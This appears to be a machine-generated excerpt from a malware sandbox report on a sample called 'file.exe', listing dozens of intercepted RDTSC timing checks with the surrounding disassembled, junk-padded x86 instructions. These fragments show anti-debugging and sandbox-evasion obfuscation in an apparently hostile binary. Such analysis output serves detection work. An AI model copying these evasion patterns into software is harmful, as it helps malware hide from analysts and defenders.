                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D4DB second address: A8D4FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374CE66336h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F374CE66326h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D4FD second address: A8D501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D501 second address: A8D548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 jne 00007F374CE6632Ch 0x0000000f pop esi 0x00000010 nop 0x00000011 mov dword ptr [ebp+12452029h], eax 0x00000017 mov ebx, dword ptr [ebp+1247E2A4h] 0x0000001d mov ecx, eax 0x0000001f add eax, ebx 0x00000021 mov ecx, dword ptr [ebp+122D3820h] 0x00000027 nop 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F374CE66337h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D548 second address: A8D58E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374C50007Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jc 00007F374C500078h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F374C500080h 0x00000018 popad 0x00000019 nop 0x0000001a mov dword ptr [ebp+122D1AF0h], eax 0x00000020 cmc 0x00000021 push 00000004h 0x00000023 sub dx, 0B0Ah 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jc 00007F374C500078h 0x00000031 push edi 0x00000032 pop edi 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBE78 second address: ADBE7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADB156 second address: ADB162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADB162 second address: ADB166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADB2C1 second address: ADB2D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 ja 00007F374C500076h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE744 second address: ADE75D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F374CE66333h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE75D second address: ADE778 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jmp 00007F374C500080h 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADEBB8 second address: ADEBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6F67 second address: AE6F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F374C500088h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE504D second address: AE505E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374CE6632Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE505E second address: AE507B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F374C50007Ch 0x00000009 jmp 00007F374C50007Dh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE507B second address: AE509B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F374CE66326h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F374CE6632Eh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE521D second address: AE522C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 jo 00007F374C500082h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE522C second address: AE526A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F374CE66326h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F374CE66338h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F374CE66338h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6C18 second address: AE6C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F374C500076h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6C22 second address: AE6C4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F374CE66337h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F374CE6632Bh 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6C4E second address: AE6C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEF387 second address: AEF38C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEF77A second address: AEF780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEF780 second address: AEF784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5F44 second address: AF5F4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF631B second address: AF632D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007F374CE66326h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF632D second address: AF6359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F374C500090h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007F374C500088h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF6359 second address: AF635F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7281 second address: AF72A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F374C500076h 0x00000010 jmp 00007F374C500086h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF72A7 second address: AF72AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF72AB second address: AF72B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7AA0 second address: AF7AB2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F374CE66328h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F374CE66326h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7AB2 second address: AF7AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5A1A second address: AF5A1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5A1E second address: AF5A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F374C50007Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B00842 second address: B00857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F374CE6632Dh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0057D second address: B00581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10008 second address: B10016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 je 00007F374CE66326h 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B123D0 second address: B123E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374C50007Fh 0x00000007 jng 00007F374C500076h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F805 second address: B1F817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a js 00007F374CE66326h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F817 second address: B1F837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 jmp 00007F374C500086h 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21500 second address: B2150A instructions: 0x00000000 rdtsc 0x00000002 js 00007F374CE66326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2150A second address: B2150F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B26A3F second address: B26A5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F374CE6632Bh 0x00000009 jmp 00007F374CE6632Eh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2DF1C second address: B2DF36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F374C500080h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2DF36 second address: B2DF3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2DF3A second address: B2DF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F374C500081h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2DF53 second address: B2DF57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2C768 second address: B2C796 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F374C50007Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007F374C500078h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 jmp 00007F374C500080h 0x0000001d pop eax 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2C915 second address: B2C91B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CA83 second address: B2CAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F374C500082h 0x0000000f jmp 00007F374C50007Fh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CAAE second address: B2CACB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F374CE66332h 0x00000008 pushad 0x00000009 jns 00007F374CE66326h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CEC4 second address: B2CEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F374C500084h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CEE3 second address: B2CEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CEE9 second address: B2CEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2D08A second address: B2D09A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F374CE66326h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2DC72 second address: B2DC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2DC79 second address: B2DC7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2DC7F second address: B2DC83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41DEC second address: B41E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F374CE66326h 0x0000000a jmp 00007F374CE66338h 0x0000000f jmp 00007F374CE66331h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41E24 second address: B41E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41E2A second address: B41E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41E2E second address: B41E32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41E32 second address: B41E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41C33 second address: B41C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F374C50007Ch 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41C47 second address: B41C82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F374CE66326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F374CE66330h 0x00000011 jmp 00007F374CE66331h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F374CE6632Ch 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B506FC second address: B5070A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F374C500076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5070A second address: B5070E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5070E second address: B50729 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374C500087h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50729 second address: B5072F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5072F second address: B50762 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F374C50007Ch 0x00000008 pop esi 0x00000009 push edi 0x0000000a jmp 00007F374C500089h 0x0000000f pop edi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50762 second address: B50768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50768 second address: B50784 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374C500086h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B53271 second address: B53281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F374CE6632Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B53281 second address: B53287 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B53287 second address: B53297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F374CE66326h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B52F7A second address: B52F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B52F80 second address: B52F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62E71 second address: B62E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62E75 second address: B62E92 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F374CE66330h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62E92 second address: B62E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62E96 second address: B62EA0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F374CE66326h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61FB6 second address: B61FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61FBF second address: B61FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61FC3 second address: B61FD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F374C500080h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6229A second address: B622A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B622A0 second address: B622CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F374C50007Dh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F374C500081h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62A05 second address: B62A28 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F374CE66333h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F374CE6632Eh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65840 second address: B6584A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F374C500076h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65AA8 second address: B65AC3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F374CE6632Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jbe 00007F374CE66334h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65AC3 second address: B65AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65AC7 second address: B65B15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 movsx edx, ax 0x0000000a push 00000004h 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F374CE66328h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 cld 0x00000027 push 21A08A8Dh 0x0000002c push eax 0x0000002d push edx 0x0000002e jo 00007F374CE6633Eh 0x00000034 jmp 00007F374CE66338h 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65B15 second address: B65B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F374C500076h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65D55 second address: B65D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65D5C second address: B65DE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374C500081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D26A5h], ebx 0x00000012 push dword ptr [ebp+122D1BA1h] 0x00000018 mov dl, ah 0x0000001a call 00007F374C500079h 0x0000001f jmp 00007F374C50007Dh 0x00000024 push eax 0x00000025 pushad 0x00000026 jmp 00007F374C50007Fh 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e pop edx 0x0000002f popad 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 jmp 00007F374C500082h 0x00000039 mov eax, dword ptr [eax] 0x0000003b pushad 0x0000003c pushad 0x0000003d push edi 0x0000003e pop edi 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 jmp 00007F374C50007Bh 0x00000047 popad 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c jc 00007F374C500084h 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
